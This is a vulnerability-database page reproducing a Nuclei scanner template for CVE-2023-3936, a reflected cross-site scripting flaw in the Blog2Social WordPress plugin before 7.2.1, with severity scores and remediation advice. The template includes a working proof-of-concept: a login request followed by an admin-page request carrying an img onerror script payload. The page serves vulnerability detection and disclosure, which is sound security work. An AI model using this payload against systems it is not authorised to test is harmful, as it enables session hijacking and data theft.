Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-3936HistoryAug 23, 2023 - 4:25 p.m.
Blog2Social < 7.2.1 - Cross-Site Scripting
2023-08-2316:25:51
ProjectDiscovery
github.com
5
cve2023
wordpress
wp-plugin
xss
authenticated
adenion
CVSS3
6.1
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS
0.001
Percentile
46.9%
The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
id: CVE-2023-3936
info:
name: Blog2Social < 7.2.1 - Cross-Site Scripting
author: luisfelipe146
severity: medium
description: |
The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to the latest version of the Blog2Social plugin (7.2.1) or apply the vendor-provided patch to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/6d09a5d3-046d-47ef-86b4-c024ea09dc0f
- https://nvd.nist.gov/vuln/detail/CVE-2023-3936
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3936
cwe-id: CWE-79
epss-score: 0.00071
epss-percentile: 0.30429
cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: adenion
product: blog2social
framework: wordpress
tags: cve2023,cve,wpscan,wordpress,wp-plugin,xss,authenticated,adenion
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Deleted 1<img src onerror=alert(document.domain)> posts"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402206a9cdd49e5fc62423b550121259ff1d80c849ab273f66ae6579dcfa7d245269d02206782a407244948dbae7962e67a7a5310a5503ad9a6f445a9f4d7813f0e3b3ea6:922c64590222798bb761d5b6d8e72950Related
cve
cve
CVE-2023-3936
2023-08-21 17:15:49
wpvulndb
wpvulndb
Blog2Social < 7.2.1 - Reflected XSS
2023-07-31 00:00:00
cvelist
cvelist
CVE-2023-3936 Blog2Social < 7.2.1 - Reflected XSS
2023-08-21 12:29:49
wpexploit
wpexploit
Blog2Social < 7.2.1 - Reflected XSS
2023-07-31 00:00:00
nvd
nvd
CVE-2023-3936
2023-08-21 17:15:49
prion
prion
Cross site scripting
2023-08-21 17:15:00
CVSS3
6.1
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS
0.001
Percentile
46.9%
Related for NUCLEI:CVE-2023-3936